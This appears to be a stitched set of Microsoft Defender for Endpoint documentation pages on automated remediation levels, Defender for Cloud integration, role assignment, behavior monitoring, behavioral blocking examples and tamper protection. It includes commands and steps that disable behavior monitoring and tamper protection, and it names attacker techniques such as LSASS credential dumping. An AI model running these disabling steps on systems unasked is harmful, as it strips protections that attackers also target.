--- *Full automation* (recommended) means remediation actions are taken automatically on artifacts determined to be malicious. (*Full automation is set by default in Defender for Business*.)-- *Semi-automation* means some remediation actions are taken automatically, but other remediation actions await approval before being taken. (See the table in [Levels of automation](#levels-of-automation).)-- All remediation actions, whether pending or completed, are tracked in the Action Center ([https://security.microsoft.com](https://security.microsoft.com)).-
-> [!TIP]
-> For best results, we recommend using full automation when you [configure AIR](configure-automated-investigations-remediation.md). Data collected and analyzed over the past year shows that customers who are using full automation had 40% more high-confidence malware samples removed than customers who are using lower levels of automation. Full automation can help free up your security operations resources to focus more on your strategic initiatives.
-
-> [!NOTE]
-> Device group creation is supported in Defender for Endpoint Plan 1 and Plan 2.
-
-## Levels of automation
-
-|Automation level|Description|
-|||
-|**Full - remediate threats automatically** <br> (also referred to as *full automation*)|With full automation, remediation actions are performed automatically on entities that are considered to be malicious. All remediation actions that are taken can be viewed in the [Action Center](auto-investigation-action-center.md) on the **History** tab. If necessary, a remediation action can be undone. <p> ***Full automation is recommended** and is selected by default for tenants with Defender for Endpoint that were created on or after August 16, 2020, with no device groups defined yet.*<p>*Full automation is set by default in Defender for Business.*|
-|**Semi - require approval for all folders** <br> (also referred to as *semi-automation*)|With this level of semi-automation, approval is required for remediation actions on all files. Such pending actions can be viewed and approved in the [Action Center](auto-investigation-action-center.md), on the **Pending** tab. Pending actions time out after 7 days. If an action times out, the behavior is the same as if the action is rejected. <p> *This level of semi-automation is selected by default for tenants that were created before August 16, 2020 with Microsoft Defender for Endpoint, with no device groups defined.*|
-|**Semi - require approval for core folders remediation** <br> (also a type of *semi-automation*)|With this level of semi-automation, approval is required for any remediation actions needed on files or executables that are in core folders. Core folders include operating system directories, such as the **Windows** (`\windows\*`). <p> Remediation actions can be taken automatically on files or executables that are in other (non-core) folders. <p> Pending actions for files or executables in core folders can be viewed and approved in the [Action Center](auto-investigation-action-center.md), on the **Pending** tab. <p> Actions that were taken on files or executables in other folders can be viewed in the [Action Center](auto-investigation-action-center.md), on the **History** tab.|
-|**Semi - require approval for non-temp folders remediation** <br> (also a type of *semi-automation*)|With this level of semi-automation, approval is required for any remediation actions needed on files or executables that aren't* in temporary folders. <p> Temporary folders can include the following examples: <ul><li>`\users\*\appdata\local\temp\*`</li><li>`\documents and settings\*\local settings\temp\*`</li><li>`\documents and settings\*\local settings\temporary\*`</li><li>`\windows\temp\*`</li><li>`\users\*\downloads\*`</li><li>`\program files\`</li><li>`\program files (x86)\*`</li><li>`\documents and settings\*\users\*`</li></ul> <p> Remediation actions can be taken automatically on files or executables that are in temporary folders. <p> Pending actions for files or executables that aren't in temporary folders can be viewed and approved in the [Action Center](auto-investigation-action-center.md), on the **Pending** tab. <p> Actions that were taken on files or executables in temporary folders can be viewed and approved in the [Action Center](auto-investigation-action-center.md), on the **History** tab.|
-|**No automated response** <br> (also referred to as *no automation*)|With no automation, automated investigation doesn't run on your organization's devices. As a result, no remediation actions are taken or pending as a result of automated investigation. However, other threat protection features, such as [protection from potentially unwanted applications](/windows/security/threat-protection/microsoft-defender-antivirus/detect-block-potentially-unwanted-apps-microsoft-defender-antivirus), can be in effect, depending on how your antivirus and next-generation protection features are configured. <p> ***Using the *no automation* option is not recommended**, because it reduces the security posture of your organization's devices. [Consider setting up your automation level to full automation (or at least semi-automation)](/microsoft-365/security/defender-endpoint/machine-groups).|
-
-## Important points about automation levels
--- Full automation has proven to be reliable, efficient, and safe, and is recommended for all customers. Full automation frees up your critical security resources so they can focus more on your strategic initiatives.--- New tenants (which include tenants that were created on or after August 16, 2020) with Defender for Endpoint are set to full automation by default.--- [Defender for Business](../defender-business/mdb-overview.md) uses full automation by default. Defender for Business doesn't use device groups the same way as Defender for Endpoint. Thus, full automation is turned on and applied to all devices in Defender for Business.--- If your security team has defined device groups with a level of automation, those settings aren't changed by the new default settings that are rolling out.--- You can keep your default automation settings, or change them according to your organizational needs. To change your settings, [set your level of automation](/microsoft-365/security/defender-endpoint/configure-automated-investigations-remediation#set-up-device-groups).-
-> [!NOTE]
-> [Defender for Business](../defender-business/mdb-overview.md) depends on real-time protection for automatic investigation. Real-time protection must be enabled and in active mode to enable automatic investigation.
-
-## Next steps
--- [Configure automated investigation and remediation capabilities in Defender for Endpoint](configure-automated-investigations-remediation.md)-- [Visit the Action Center](/microsoft-365/security/defender-endpoint/auto-investigation-action-center#the-action-center)
security Azure Server Integration https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/azure-server-integration.md
- Title: Integration with Microsoft Defender for Cloud
-description: Learn about Microsoft Defender for Endpoint integration with Microsoft Defender for Cloud
------- m365-security-- tier3- Previously updated : 05/03/2021--
-# Integration with Microsoft Defender for Cloud
--
-**Applies to:**
-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- Microsoft Defender for Cloud-
-Microsoft Defender for Endpoint can integrate with Microsoft Defender for Cloud to provide a comprehensive Windows server protection solution. With this integration, Microsoft Defender for Cloud can use the power of Defender for Endpoint to provide improved threat detection for Windows Servers.
-
-The following capabilities are included in this integration:
--- Automated onboarding - Defender for Endpoint sensor is automatically enabled on Windows Servers that are onboarded to Microsoft Defender for Cloud. For more information on Microsoft Defender for Cloud onboarding, see [Use the integrated Microsoft Defender for Endpoint license](/azure/security-center/security-center-wdatp).-
- > [!NOTE]
- > The integration between Microsoft Defender for servers and Microsoft Defender for Endpoint has been expanded to support [Windows Server 2019 and Azure Virtual Desktop (AVD)](/azure/security-center/release-notes#microsoft-defender-for-endpoint-integration-with-azure-defender-now-supports-windows-server-2019-and-windows-10-virtual-desktop-wvd-in-preview).
--- Windows servers monitored by Microsoft Defender for Cloud will also be available in Defender for Endpoint - Microsoft Defender for Cloud seamlessly connects to the Defender for Endpoint tenant, providing a single view across clients and servers. In addition, Defender for Endpoint alerts will be available in the Microsoft Defender for Cloud console.-- Server investigation - Microsoft Defender for Cloud customers can access the Microsoft Defender portal to perform detailed investigation to uncover the scope of a potential breach.-
-> [!IMPORTANT]
->
-> - When you use Microsoft Defender for Cloud to monitor servers, a Defender for Endpoint tenant is automatically created (in the US for US users, in the EU for European and UK users).
-> Data collected by Defender for Endpoint is stored in the geo-location of the tenant as identified during provisioning.
-> - If you use Defender for Endpoint before using Microsoft Defender for Cloud, your data will be stored in the location you specified when you created your tenant even if you integrate with Microsoft Defender for Cloud at a later time.
-> - Once configured, you cannot change the location where your data is stored. If you need to move your data to another location, you need to contact Microsoft Support to reset the tenant.
-> Server endpoint monitoring utilizing this integration has been disabled for Office 365 GCC customers.
-
-## Related topics
--- [Onboard previous versions of Windows](onboard-downlevel.md)-- [Onboard Windows Server 2012 R2, 2016, SAC version 1803, and 2019](configure-server-endpoints.md)
security Basic Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/basic-permissions.md
- Title: Use basic permissions to access the portal
-description: Learn how to use basic permissions to access the Microsoft Defender for Endpoint portal.
-----
- - has-azure-ad-ps-ref
- - azure-ad-ref-level-one-done
---- m365-security-- tier2- Previously updated : 02/21/2024--
-# Use basic permissions to access the portal
--
-**Applies to:**
-- Microsoft Entra ID-- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-basicaccess-abovefoldlink)
-
-Refer to the instructions below to use basic permissions management.
-
-You can use either of the following solutions:
--- Microsoft Graph PowerShell-- Azure portal-
-For granular control over permissions, [switch to role-based access control](rbac.md).
-
-## Assign user access using Microsoft Graph PowerShell
-
-You can assign users with one of the following levels of permissions:
--- Full access (Read and Write)-- Read-only access-
-### Before you begin
--- Install Microsoft Graph PowerShell. For more information, see, [How to install Microsoft Graph PowerShell](/powershell/microsoftgraph/installation).-
- > [!NOTE]
- > You need to run the PowerShell cmdlets in an elevated command-line.
--- Connect to your Microsoft Entra ID. For more information, see [Connect-MgGraph](/powershell/microsoftgraph/authentication-commands).-
- - **Full access**: Users with full access can log in, view all system information and resolve alerts, submit files for deep analysis, and download the onboarding package. Assigning full access rights requires adding the users to the "Security Administrator" or "Global Administrator" Microsoft Entra built-in roles.
- - **Read-only access**: Users with read-only access can log in, view all alerts, and related information.
-
- They will not be able to change alert states, submit files for deep analysis or perform any state changing operations.
-
- Assigning read-only access rights requires adding the users to the "Security Reader" Microsoft Entra built-in role.
-
-Use the following steps to assign security roles:
--- For **read and write** access, assign users to the security administrator role by using the following command:-
- ```PowerShell
- $Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security Administrator'"
- $UserId = (Get-MgUser -UserId "secadmin@Contoso.onmicrosoft.com").Id
-
- $DirObject = @{
- "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
- }
-
- New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter $DirObject
- ```
--- For **read-only** access, assign users to the security reader role by using the following command:-
- ```PowerShell
- $Role = Get-MgDirectoryRole -Filter "DisplayName eq 'Security Reader'"
- $UserId = (Get-MgUser -UserId "reader@Contoso.onmicrosoft.com").Id
-
- $DirObject = @{
- "@odata.id" = "https://graph.microsoft.com/v1.0/directoryObjects/$UserId"
- }
-
- New-MgDirectoryRoleMemberByRef -DirectoryRoleId $Role.Id -BodyParameter $DirObject
- ```
-
-For more information, see [Add or remove group members using Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-groups-members-azure-portal).
-
-## Assign user access using the Azure portal
-
-For more information, see [Assign administrator and non-administrator roles to users with Microsoft Entra ID](/azure/active-directory/fundamentals/active-directory-users-assign-role-azure-portal).
-
-## Related topic
--- [Manage portal access using RBAC](rbac.md)
security Behavior Monitor https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/behavior-monitor.md
- Title: Behavior monitoring in Microsoft Defender Antivirus
-description: Learn about Behavior monitoring in Microsoft Defender Antivirus and Defender for Endpoint.
------- Previously updated : 02/29/2024--
-# Behavior monitoring in Microsoft Defender Antivirus
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Business](https://www.microsoft.com/security/business/endpoint-security/microsoft-defender-business)-- [Microsoft Defender for Individuals](https://www.microsoft.com/microsoft-365/microsoft-defender-for-individuals)-- Microsoft Defender Antivirus-
-Behavior monitoring is a critical detection and protection functionality of Microsoft Defender Antivirus.
-
-Monitors process behavior to detect and analyze potential threats based on the behavior of applications, services, and files. Rather than relying solely on signature-based detection (which identifies known malware patterns), behavior monitoring focuses on observing how software behaves in real-time. HereΓÇÖs what it entails:
-
-1. Real-Time Threat Detection:
- - Continuously observe processes, file system activities, and interactions within the system.
- - Defender Antivirus can identify patterns associated with malware or other threats. For example, it looks for processes making unusual changes to existing files, modifying or creating automatic startup registry (ASEP) keys, and other alterations to the file system or structure.
-
-2. Dynamic Approach:
--- Unlike static, signature-based detection, behavior monitoring adapts to new and evolving threats.--- Microsoft Defender Antivirus uses predefined patterns, and observes how software behaves during execution. For malware that doesnΓÇÖt fit any predefined pattern, Microsoft Defender Antivirus uses anomaly detection.--- If a program shows suspicious behavior (for example, attempting to modify critical system files), Microsoft Defender Antivirus can take action to prevent further harm, and revert some previous malware actions.-
-Behavior monitoring enhances Defender AntivirusΓÇÖs ability to proactively detect emerging threats by focusing on real-time actions and behaviors rather than relying solely on known signatures.
-
-The following features depend on behavior monitoring.
-
-**Anti-malware**:
--- Indicators, File hash, allow/block-
-**Network Protection**:
--- Indicators, IP address/URL, allow/block-- Web Content Filtering, allow/block-
-> [!NOTE]
-> Behavior monitoring is protected by tamper protection.
-
-To temporarily disable behavior monitoring in order to remove it out of the picture, you want to first enable Troubleshooting mode, disable Tamper Protection, and then disable behavior monitoring.
-
-## Change the behavior monitoring policy
-
-The following table shows the different ways to configure behavior monitoring.
-
-| Management tool | Name | Links |
-||||
-| Security Settings Management | Allow behavior monitoring | This article |
-| Intune | Allow behavior monitoring | [Windows Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-windows#real-time-protection) |
-| CSP | AllowBehaviorMonitoring | [Defender Policy CSP](/mem/intune/protect/antivirus-microsoft-defender-settings-windows#real-time-protection) |
-| Configuration Manager Tenant Attach | Turn on behavior monitoring | [Windows Antivirus policy settings from Microsoft Defender Antivirus for tenant attached devices](/mem/intune/protect/antivirus-microsoft-defender-settings-windows-tenant-attach#real-time-protection) |
-| Group Policy | Turn on behavior monitoring | [Download Group Policy Settings Reference Spreadsheet for Windows 11 2023 Update (23H2)](https://www.microsoft.com/download/details.aspx?id=105668) |
-| PowerShell | Set-Preference -DisableBehaviorMonitoring | [Set-MpPreference](/powershell/module/defender/set-mppreference#-disablebehaviormonitoring) |
-| WMI | boolean DisableBehaviorMonitoring; | [MSFT\_MpPreference class](/previous-versions/windows/desktop/defender/msft-mppreference) |
-
-If you use Microsoft Defender for Business, see [Review or edit your next-generation protection policies in Microsoft Defender for Business](/microsoft-365/security/defender-business/mdb-next-generation-protection).
-
-## Modify the behavior monitoring settings by using PowerShell
-
-Use the following command to modify the behavior monitoring settings:
-
-```powershell
-Set-MpPreference -DisableBehaviorMonitoring <true | false>
-```
--- `True` disables Behavior monitoring.-- `False` enables Behavior monitoring.-
-For more information, see [Set-MpPreference](/powershell/module/defender/set-mppreference#-disablebehaviormonitoring).
-
-## Query the behavior monitoring status from PowerShell
-
-```powershell
-Get-MpComputerStatus | Format-Table BehaviorMonitorEnabled
-```
-
-If the value returned is `true`, behavior monitoring is enabled.
-
-## Query the behavior monitoring status by using Advanced Hunting
-
-You can use Advanced Hunting (AH) to query the status of behavior monitoring.
-
-Requires Microsoft Defender XDR, Microsoft Defender for Endpoint Plan 2, or Microsoft Defender for Business.
-
-```kusto
-let EvalTable = DeviceTvmSecureConfigurationAssessment
-| where ConfigurationId in ("scid-91")
-| summarize arg_max(Timestamp,IsCompliant, IsApplicable) by DeviceId, ConfigurationId,tostring(Context)
-| extend Test = case(
-ConfigurationId == "scid-91" , "BehaviorMonitoring",
-"N/A"),
-Result = case(IsApplicable == 0,"N/A",IsCompliant == 1 , "Enabled", "Disabled")
-| extend packed = pack(Test,Result)
-| summarize Tests = make_bag(packed) by DeviceId
-| evaluate bag_unpack(Tests);
-let DefUpdate = DeviceTvmSecureConfigurationAssessment
-| where ConfigurationId == "scid-2011"
-// | where isnotnull(Context)
-| extend Definition = parse_json(Context[0][0])
-| extend LastUpdated = parse_json(Context[0][2])
-| project DeviceId,Definition,LastUpdated;
-let DeviceInformation = DeviceInfo
-| where isnotempty(OSPlatform)
-| summarize arg_max(Timestamp,*) by DeviceId, DeviceName
-| project DeviceId, DeviceName, MachineGroup;
-let withNames = EvalTable
-| join kind = inner DeviceInformation on DeviceId
-| project-away DeviceId1
-| project-reorder DeviceName, MachineGroup;
-withNames | join kind = fullouter DefUpdate on DeviceId
-| project-away DeviceId1
-| sort by BehaviorMonitoring asc
-```
-
-## Troubleshooting high CPU usage
-
-Detections related to behavior monitoring start with "[Behavior](/microsoft-365/security/defender/malware-naming#type)".
-
-When investigating high CPU usage in `MsMpEng.exe`, you can temporarily disable behavior monitoring to see if the issues continue.
-
-You can use Performance analyzer for Microsoft Defender Antivirus to find **\path\process**, **process** and/or **file extensions** that are contributing to the high cpu utilization. You can then add these items to [Contextual Exclusion](configure-contextual-file-folder-exclusions-microsoft-defender-antivirus.md).
-
-For more information, see [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md).
-
-If you're seeing high CPU usage caused by behavior monitoring, continue troubleshooting the issue by reverting each of the following items in order. Re-enable behavior monitoring after reverting each item to identify where the problem might be.
-
-1. **platform update**
-2. **engine update**
-3. **security intelligence update**.
-
-If you're still encountering high CPU usage issues, contact Microsoft support and have your Client Analyzer data ready.
-
-If behavior monitoring isn't causing the issue, use [Performance analyzer for Microsoft Defender Antivirus](tune-performance-defender-antivirus.md) to collect log information. Collect two different logs using `a -c` and `a -a`. Have this information ready when you contact Microsoft support.
-
-For more information, see [Data collection for advanced troubleshooting on Windows](data-collection-analyzer.md).
security Behavioral Blocking Containment https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/behavioral-blocking-containment.md
- Title: Behavioral blocking and containment
-description: Learn about behavioral blocking and containment capabilities at Microsoft Defender for Endpoint
----------- m365-security-- tier2 Previously updated : 02/29/2024--
-# Behavioral blocking and containment
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](/microsoft-365/security/defender-endpoint/defender-endpoint-plan-1)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender XDR](https://go.microsoft.com/fwlink/?linkid=2118804)-- Microsoft Defender Antivirus-
-**Platforms**
-- Windows-
-> Want to experience Defender for Endpoint? [Sign up for a free trial.](https://signup.microsoft.com/create-account/signup?products=7f379fee-c4f9-4278-b0a1-e4c8c2fcdf7e&ru=https://aka.ms/MDEp2OpenTrial?ocid=docs-wdatp-assignaccess-abovefoldlink)
-
-## Overview
-
-Today's threat landscape is overrun by [fileless malware](/microsoft-365/security/defender-endpoint/malware/fileless-threats) and that lives off the land, highly polymorphic threats that mutate faster than traditional solutions can keep up with, and human-operated attacks that adapt to what adversaries find on compromised devices. Traditional security solutions aren't sufficient to stop such attacks; you need artificial intelligence (AI) and device learning (ML) backed capabilities, such as behavioral blocking and containment, included in [Defender for Endpoint](/windows/security).
-
-Behavioral blocking and containment capabilities can help identify and stop threats, based on their behaviors and process trees even when the threat has started execution. Next-generation protection, EDR, and Defender for Endpoint components and features work together in behavioral blocking and containment capabilities.
-
-Behavioral blocking and containment capabilities work with multiple components and features of Defender for Endpoint to stop attacks immediately and prevent attacks from progressing.
--- [Next-generation protection](microsoft-defender-antivirus-in-windows-10.md) (which includes Microsoft Defender Antivirus) can detect threats by analyzing behaviors, and stop threats that have started running.--- [Endpoint detection and response](overview-endpoint-detection-response.md) (EDR) receives security signals across your network, devices, and kernel behavior. As threats are detected, alerts are created. Multiple alerts of the same type are aggregated into incidents, which makes it easier for your security operations team to investigate and respond.--- [Defender for Endpoint](overview-endpoint-detection-response.md) has a wide range of optics across identities, email, data, and apps, in addition to the network, endpoint, and kernel behavior signals received through EDR. A component of [Microsoft Defender XDR](../defender/microsoft-365-defender.md), Defender for Endpoint processes and correlates these signals, raises detection alerts, and connects related alerts in incidents.-
-With these capabilities, more threats can be prevented or blocked, even if they start running. Whenever suspicious behavior is detected, the threat is contained, alerts are created, and threats are stopped in their tracks.
-
-The following image shows an example of an alert that was triggered by behavioral blocking and containment capabilities:
--
-## Components of behavioral blocking and containment
--- **On-client, policy-driven [attack surface reduction rules](attack-surface-reduction.md)** Predefined common attack behaviors are prevented from executing, according to your attack surface reduction rules. When such behaviors attempt to execute, they can be seen in <a href="https://go.microsoft.com/fwlink/p/?linkid=2077139" target="_blank">Microsoft Defender XDR</a> as informational alerts. Attack surface reduction rules aren't enabled by default; you configure your policies in the [Microsoft Defender portal](/microsoft-365/security/defender/microsoft-365-defender).--- **[Client behavioral blocking](client-behavioral-blocking.md)** Threats on endpoints are detected through machine learning, and then are blocked and remediated automatically. (Client behavioral blocking is enabled by default.)--- **[Feedback-loop blocking](feedback-loop-blocking.md)** (also referred to as rapid protection) Threat detections are observed through behavioral intelligence. Threats are stopped and prevented from running on other endpoints. (Feedback-loop blocking is enabled by default.)--- **[Endpoint detection and response (EDR) in block mode](edr-in-block-mode.md)** Malicious artifacts or behaviors that are observed through post-breach protection are blocked and contained. EDR in block mode works even if Microsoft Defender Antivirus isn't the primary antivirus solution. (EDR in block mode isn't enabled by default; you turn it on at Microsoft Defender XDR.)-
-Expect more to come in the area of behavioral blocking and containment, as Microsoft continues to improve threat protection features and capabilities. To see what's planned and rolling out now, visit the [Microsoft 365 roadmap](https://www.microsoft.com/microsoft-365/roadmap).
-
-## Examples of behavioral blocking and containment in action
-
-Behavioral blocking and containment capabilities have blocked attacker techniques such as the following:
--- Credential dumping from LSASS-- Cross-process injection-- Process hollowing-- User Account Control bypass-- Tampering with antivirus (such as disabling it or adding the malware as exclusion)-- Contacting Command and Control (C&C) to download payloads-- Coin mining-- Boot record modification-- Pass-the-hash attacks-- Installation of root certificate-- Exploitation attempt for various vulnerabilities-
-Below are two real-life examples of behavioral blocking and containment in action.
-
-### Example 1: Credential theft attack against 100 organizations
-
-As described in [In hot pursuit of elusive threats: AI-driven behavior-based blocking stops attacks in their tracks](https://www.microsoft.com/security/blog/2019/10/08/in-hot-pursuit-of-elusive-threats-ai-driven-behavior-based-blocking-stops-attacks-in-their-tracks), a credential theft attack against 100 organizations around the world was stopped by behavioral blocking and containment capabilities. Spear-phishing email messages that contained a lure document were sent to the targeted organizations. If a recipient opened the attachment, a related remote document was able to execute code on the user's device and load Lokibot malware, which stole credentials, exfiltrated stolen data, and waited for further instructions from a command-and-control server.
-
-Behavior-based device-learning models in Defender for Endpoint caught and stopped the attacker's techniques at two points in the attack chain:
--- The first protection layer detected the exploit behavior. Device-learning classifiers in the cloud correctly identified the threat as and immediately instructed the client device to block the attack.-- The second protection layer, which helped stop cases where the attack got past the first layer, detected process hollowing, stopped that process, and removed the corresponding files (such as Lokibot).-
-While the attack was detected and stopped, alerts, such as an "initial access alert," were triggered and appeared in the [Microsoft Defender portal](/microsoft-365/security/defender/microsoft-365-defender).
--
-This example shows how behavior-based device-learning models in the cloud add new layers of protection against attacks, even after they have started running.
-
-### Example 2: NTLM relay - Juicy Potato malware variant
-
-As described in the recent blog post, [Behavioral blocking and containment: Transforming optics into protection](https://www.microsoft.com/security/blog/2020/03/09/behavioral-blocking-and-containment-transforming-optics-into-protection), in January 2020, Defender for Endpoint detected a privilege escalation activity on a device in an organization. An alert called "Possible privilege escalation using NTLM relay" was triggered.
--
-The threat turned out to be malware; it was a new, not-seen-before variant of a notorious hacking tool called Juicy Potato, which is used by attackers to get privilege escalation on a device.
-
-Minutes after the alert was triggered, the file was analyzed, and confirmed to be malicious. Its process was stopped and blocked, as shown in the following image:
--
-A few minutes after the artifact was blocked, multiple instances of the same file were blocked on the same device, preventing more attackers or other malware from deploying on the device.
-
-This example shows that with behavioral blocking and containment capabilities, threats are detected, contained, and blocked automatically.
-
-> [!TIP]
-> If you're looking for Antivirus related information for other platforms, see:
-> - [Set preferences for Microsoft Defender for Endpoint on macOS](mac-preferences.md)
-> - [Microsoft Defender for Endpoint on Mac](microsoft-defender-endpoint-mac.md)
-> - [macOS Antivirus policy settings for Microsoft Defender Antivirus for Intune](/mem/intune/protect/antivirus-microsoft-defender-settings-macos)
-> - [Set preferences for Microsoft Defender for Endpoint on Linux](linux-preferences.md)
-> - [Microsoft Defender for Endpoint on Linux](microsoft-defender-endpoint-linux.md)
-> - [Configure Defender for Endpoint on Android features](android-configure.md)
-> - [Configure Microsoft Defender for Endpoint on iOS features](ios-configure-features.md)
-
-## Next steps
--- [Learn more about Defender for Endpoint](overview-endpoint-detection-response.md)--- [Configure your attack surface reduction rules](attack-surface-reduction.md)--- [Enable EDR in block mode](edr-in-block-mode.md)--- [See recent global threat activity](https://www.microsoft.com/wdsi/threats)--- [Get an overview of Microsoft Defender XDR](../defender/microsoft-365-defender.md)
security Built In Protection https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/defender-endpoint/built-in-protection.md
- Title: Built-in protection helps guard against ransomware
-description: Learn how built-in protection protects against ransomware as part of Microsoft Defender for Endpoint.
---- Previously updated : 06/06/2023----- m365-security-- tier2-- mde-ngp----
-# Built-in protection helps guard against ransomware
-
-**Applies to:**
--- [Microsoft Defender for Endpoint Plan 1](https://go.microsoft.com/fwlink/p/?linkid=2154037)-- [Microsoft Defender for Endpoint Plan 2](https://go.microsoft.com/fwlink/p/?linkid=2154037)-
-[Microsoft Defender for Endpoint](microsoft-defender-endpoint.md) helps prevent, detect, investigate, and respond to advanced threats, such as ransomware attacks. [Next-generation protection](next-generation-protection.md) and [attack surface reduction](overview-attack-surface-reduction.md) capabilities in Defender for Endpoint were designed to catch emerging threats. In order for the best protection from ransomware and other cyberthreats to be in place, certain settings must be configured. Built-in protection can help by providing you with default settings for better protection.
-
-> [!TIP]
-> **You don't have to wait for built-in protection to come to you**! You can protect your organization's devices now by configuring these capabilities:
-> - [Enable cloud protection](enable-cloud-protection-microsoft-defender-antivirus.md)
-> - [Turn tamper protection on](prevent-changes-to-security-settings-with-tamper-protection.md)
-> - [Set standard attack surface reduction rules to block mode](attack-surface-reduction-rules-deployment.md)
-> - [Enable network protection in block mode](enable-network-protection.md)
-
-## What is built-in protection, and how does it work?
-
-Built-in protection is a set of default settings that are rolling out to help ensure your devices are protected. These default settings are designed to protect devices from ransomware and other threats. Initially, built-in protection includes turning [tamper protection](prevent-changes-to-security-settings-with-tamper-protection.md) on for your tenant, with other default settings coming soon. For more information, see the Tech Community blog post, [Tamper protection will be turned on for all enterprise customers](https://techcommunity.microsoft.com/t5/microsoft-defender-for-endpoint/tamper-protection-will-be-turned-on-for-all-enterprise-customers/ba-p/3616478).
-
-| Phase | What happens |
-|:|:|
-| Built-in protection is rolling out | Customers are receiving [notification](#what-does-the-notification-look-like) that built-in protection is coming. If it's not already configured, tamper protection is turned on for customers who have Defender for Endpoint Plan 2 or Microsoft 365 E5. |
-| Built-in protection becomes available for your tenant | You'll be [notified](#what-does-the-notification-look-like) that your tenant is about to receive built-in protection and when tamper protection will be turned on (if it's not already configured). |
-| Built-in protection arrives | Tamper protection is turned on for your tenant, and is applied to your organization's Windows devices. You can [opt out](#can-i-opt-out) or [change your built-in protection settings](#can-i-change-built-in-protection-settings). |
-| After built-in protection has arrived | Whenever new devices are onboarded to Defender for Endpoint, built-in protection settings are applied to any new devices running Windows. You can always [change your built-in protection settings](#can-i-change-built-in-protection-settings). |
-
-> [!NOTE]
-> Built-in protection sets default values for Windows and Mac devices. If endpoint security settings change, such as through baselines or policies in [Microsoft Intune](/mem/endpoint-manager-overview), those settings override the built-in protection settings.
-
-## What does the notification look like?
-
-You can expect to receive two types of notifications:
--- A message center post indicating that built-in protection is coming soon; and -- A banner in the Microsoft Defender portal that resembles the following image:-
- :::image type="content" source="media/bip-notification-m365defender.png" alt-text="Screenshot showing yellow banner highlighting built in protection in Microsoft Defender portal.":::
-
-Your notification tells you when built-in protection is coming and when tamper protection will be turned on (if it's not already configured) for your tenant.
-
-## Can I opt out?
-
-You can opt out of built-in protection by specifying your own security settings. For example, if you prefer to not have tamper protection turned on automatically for your tenant, you can explicitly opt out.
-
-> [!CAUTION]
-> **We do not recommend turning tamper protection off**. Tamper protection provides you with better ransomware protection.
-> You must be a global administrator or security administrator to perform the following procedure.
-
-1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.
-
-2. Go to **Settings** > **Endpoints** > **Advanced features**.
-
-3. Set **Tamper protection** to **On** (if it's not already on), and then select **Save preferences**. *Don't leave this page yet*.
-
-4. Set **Tamper protection** to **Off**, and then select **Save preferences**.
-
-## Can I change built-in protection settings?
-
-Built-in protection is a set of default settings. You aren't required to keep these default settings in place. You can always change your settings to suit your business needs. The following table lists tasks your security team might perform, along with links to learn more.
-
-| Task | Description |
-|:|:|
-| Determine whether tamper protection is turned on for your organization | 1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.<br/><br/>2. Go to **Settings** > **Endpoints** > **Advanced features** > **Tamper protection**. |
-| Manage tamper protection tenant wide using the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) | 1. Go to the Microsoft Defender portal ([https://security.microsoft.com](https://security.microsoft.com)) and sign in.<br/><br/>2. Go to **Settings** > **Endpoints** > **Advanced features**.<br/><br/>3. Set **Tamper protection** to **On** (*recommended*) or **Off**.<br/><br/>4. Select **Save preferences**.<br/><br/>See [Manage tamper protection for your organization using Microsoft Defender portal](manage-tamper-protection-microsoft-365-defender.md). |
-| Set tamper protection settings for some, but not all, devices | Use endpoint security policies and profiles that are applied to specific devices. <br/><br/>See the following articles:<br/>- [Manage tamper protection using Microsoft Intune](manage-tamper-protection-intune.md)<br/>- [Manage tamper protection using tenant attach with Configuration Manager, version 2006](manage-tamper-protection-configuration-manager.md)|
-| Turn tamper protection on or off on an individual Windows device | 1. On your Windows device, select **Start**, and start typing *Security*.<br/><br/>2. In the search results, select **Windows Security**.<br/><br/>3. Select **Virus & threat protection** > **Virus & threat protection settings**.<br/><br/>4. Set **Tamper Protection** to **On** (*recommended*) or **Off**. <br/><br/>If the device is onboarded to Defender for Endpoint, or the device is managed in the Microsoft Intune admin center, those settings will override user settings on the individual device. See [Manage tamper protection on an individual device](manage-tamper-protection-individual-device.md). |
-| Turn tamper protection on or off manually on a Mac | 1. On your Mac, open Finder, and go to **Applications** > **Utilities** > **Terminal**.<br/><br/>2. In Terminal, type the following command `sudo mdatp config tamper-protection enforcement-level --value (chosen mode)`.<br/><br/>See [Manual configuration](tamperprotection-macos.md#manual-configuration). |
